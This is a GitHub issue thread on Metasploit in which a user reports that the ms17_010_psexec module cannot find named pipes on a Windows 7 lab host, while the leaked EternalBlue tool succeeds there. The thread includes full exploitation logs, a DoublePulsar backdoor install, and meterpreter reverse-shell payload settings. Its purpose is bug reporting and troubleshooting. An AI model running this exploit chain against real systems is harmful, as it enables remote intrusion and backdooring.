Metasploit-framework: ms17_010_psexec is not detecting namedpipes that the eternalblue (TSB) is.
Steps to reproduce
How'd you do it?
fb Touch (Namedpipetouch) > execute
[!] Preparing to Execute Namedpipetouch
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.11.1.73] :
[?] Destination Port [445] :
[+] (TCP) Local 10.11.1.73:445
[+] Configure Plugin Remote Tunnels
Module: Namedpipetouch
======================
Name Value
---- -----
NetworkTimeout 60
TargetIp 10.11.1.73
TargetPort 445
UsingNbt False
PipeList ['\PIPE\browser', '\PIPE\lsarpc', '\PIPE\spoolss',
'\PIPE\360OnAccessGet', '\PIPE\360OnAccessSet', '
\PIPE\aswUpdSv', '\PIPE\afwCallbackPipe2', '\PIPE\
afwCallbackPipe2', '\PIPE\aswUpdSv', '\PIPE\_pspus
er_780_AVGIDSMONITOR.EXE_9d97da47-8de1-4699-b3da-9
eafb262f2a4', '\PIPE\AVG7B14C58C-E30D-11DB-B553-F8
... (plus 47 more lines)
DescList ['OS Pipe: computer browser', 'OS Pipe: lsass rpc'
, 'OS Pipe: print spooler', '360 Safe', '360 Safe'
, 'alwil Avast professional 4.8 Avast Internet Sec
urity v5.0', 'Avast Internet Security 5.0', 'Avast
Internet Security 5.0', 'Avast pro 4.8 or Avast I
S v5.0', 'AVG IS 8.5', 'AVG IS 8.5', 'AVG IS 8.5',
... (plus 35 more lines)
Protocol SMB
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Initializing Connection...
[+] Connection established.
[+] Testing 86 pipes
[+] Testing for OS Pipe: computer browser
[+] Pipe Found: \PIPE\browser
[+] Testing for OS Pipe: lsass rpc
[+] Pipe Found: \PIPE\lsarpc
Throwing EternalBlue from here works.
```Module: Eternalblue
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.11.1.73
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[] Executing Plugin
[] Connecting to target for exploitation.
[+] Connection established for exploitation.
[] Pinging backdoor...
[+] Backdoor not installed, game on.
[] Target OS selected valid for OS indicated by SMB reply
[] CORE raw buffer dump (43 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
0x00000020 69 63 65 20 50 61 63 6b 20 31 00 ice Pack 1.
[] Building exploit buffer
[] Sending all but last fragment of exploit packet
................DONE.
[] Sending SMB Echo request
[] Good reply from SMB Echo request
[] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[] Sending SMB Echo request
[] Good reply from SMB Echo request
[] Sending last fragment of exploit packet!
DONE.
[] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[] Sending egg to corrupted connection.
[] Triggering free of corrupted buffer.
[] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >
When trying to use the new module, i have encountered 3 instances where Eternalblue worked but this module bail due to not finding a namedpipe.
```msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.11.1.73 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.11.0.70 yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!
Even when I specify the NAMEDPIPE it still is unable to find it. Looking at wireshark, I can see that it detects and gets an ACCESS DENIED.
If namedpipe is not detected, should it just use eternalblue? I do not see it using namedpipes in the actual exploit.
I installed Metasploit with:
- [ x] git clone
OS
What OS are you running Metasploit on? Kali
Cr0n1c
All 19 comments
my moule always said “” /usr/share/metasploit-framework/modules/auxiliary/admin/smb/ms17_010_command.rb: NameError uninitialized constant Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010“
I don't konw why,could you help me to handle this issue?
Shadowshusky
on 8 Feb 2018
mine did too, easiest thing to do is checkout the dev branch. It fixed my stuff. I then ran ```cp -R /root/git/metasploit-framework/ /real/path/to/metasploit-framework. That fixed the issues
Cr0n1c
on 8 Feb 2018
Hmm, if you are getting access denied, does this mean that authentication via SMBUser/SMBPass is needed on the target? Can you say more about the target @Cr0n1c ?
busterb
on 8 Feb 2018
emm...i still have some questions. you mean,git this metasploit framework to my kali,then run it?
I move ms17_010_psexec.rb to /usr/share/metasploit-framework/mouldes/exploit/windows/smb,which is same path in this git.But it dosen't work,.....
Shadowshusky
on 8 Feb 2018
@Shadowshusky your issues aren't related detecting name pipes. See issue #9499
bcoles
on 8 Feb 2018
@bcoles thanks,i will try it.
Shadowshusky
on 8 Feb 2018
me too
dark8960
on 8 Feb 2018
In logical order:
-> fuzzbunch-2018-02-08.11.31.26.989000.txt : Contains the order I ran the scripts.
-> smbtouch
-> Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.txt: Text based results of the scan
-> smbtouch.pcap: Wireshark capture of the scan
-> namedpipetouch
-> Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.txt: Text based results of the scan
-> namedpipetouch.pcap: Wireshark capture of the scan
-> eternalblue
-> Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.txt: Text based results of exploit (it was already implanted, so it bailed)
-> Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.txt: Text based results of exploit
-> eternalblue_fuzzbunch.pcap: Wireshark capture of the successful exploit (not the already sploited on)
-> doublepulsar
-> Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.txt: Text based results [proof of successful sploit]
Metasploit
===================================================
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/smb_version) > run
[+] 10.11.1.73:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:GAMMA) (workgroup:WORKGROUP )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditor
msf5 auxiliary(scanner/smb/pipe_auditor) > show options
Module options (auxiliary/scanner/smb/pipe_auditor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf5 auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.11.1.73
RHOSTS => 10.11.1.73
msf5 auxiliary(scanner/smb/pipe_auditor) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/pipe_auditor) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.11.1.73
RHOST => 10.11.1.73
msf5 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 10.11.1.73 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.11.0.70:4444
[*] 10.11.1.73:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.11.1.73:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
===================================================
-> msf_smb_version_and_pipe_auditor.pcap: Wireshark capture of the scan.
-> msf_ms17_010_psexec.pcap: Wireshark capture of the failed exploit attempt.
CobaltStrike
-> 10.11.1.73_system_info.txt: ran systeminfo and dir on c:\ Target is a x86 Windows 7
10.11.1.73_system_info.txt
Doublepulsar-1.3.1.exe-2018-02-08.11.43.12.308000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.06.388000.log
Doublepulsar-1.3.1.exe-2018-02-08.11.44.27.420000.log
Eternalblue-2.2.0.exe-2018-02-08.11.34.50.727000.log
Eternalblue-2.2.0.exe-2018-02-08.11.41.57.920000.log
fuzzbunch-2018-02-08.11.31.26.967000.log
fuzzbunch-2018-02-08.11.31.26.989000.log
Namedpipetouch-2.0.0.exe-2018-02-08.11.32.55.080000.log
Smbtouch-1.1.1.exe-2018-02-08.11.31.49.254000.log
Smbtouch-1.1.1.exe-2018-02-08.11.44.54.682000.log
Cr0n1c
on 8 Feb 2018
Based on what I am seeing... the eternalblue exploit does not rely on needing a namedpipe. It looks like the other eternals need an authenticated pipe to work.
Cr0n1c
on 8 Feb 2018
me too,i'm the same target
tkqasn
on 11 Feb 2018
Have you solved the problem?@Cr0n1c
th1sm0r1
on 2 Mar 2018
namepipe on widnows 10 ???
gearcapitan
on 2 Mar 2018
To be able to use auxiliary/admin/smb/ms17_010_command:
+
+1. You can OPTIONALLY use a valid username/password to bypass most of these requirements.
+2. The firewall must allow SMB traffic.
+3. The target must use SMBv1.
+4. The target must be missing the MS17-010 patch.
+5. The target must allow anonymous IPC$ and a Named Pipe.
+
+You can check all of these with the SMB MS17-010 and Pipe Auditor auxiliary scanner modules.
I guess the problem may happen in namedpipe.maybe the target changed some options(such as some security standard,so we can't read the namedpipe.I guess if we have the password to login smb,maybe can success.
Shadowshusky
on 8 Mar 2018
@Shadowshusky Yes, but if I already have the password for what the fuck I want the exploit ms17 for that there is the exploit only psexec, because what you mention then makes this "exploit" useless because eternal blue if it works but eternal synergy with champions is very conflammatory, obio if or if the so is vulnerable when I do the virtual lab I make sure it is fulnerable and the exploit eternal blue works perfect but this noo osea wft? What's going on?
gearcapitan
on 8 Mar 2018
My side is all windows10 14393
There is no success.
th1sm0r1
on 8 Mar 2018
on the same boat here.... works flawlessly on win 7 ultimate but wont in win 7 pro
kawaxi
on 17 Mar 2018
On the same boat too
xiaoxiaoleo
on 25 Mar 2018
You just need access to the IPC$ share, not a named pipe.
busterb
on 2 Jul 2018
Based on what I am seeing... the
eternalblueexploit does not rely on needing a namedpipe. It looks like the othereternalsneed an authenticated pipe to work.
Are you solved your problem?
imanihb2007
on 4 Oct 2018
Related issues
felipee07
·
3Comments
bugshere
·
3Comments
idetest41
·
3Comments
Sonya2010
·
3Comments
fluit105
·
3Comments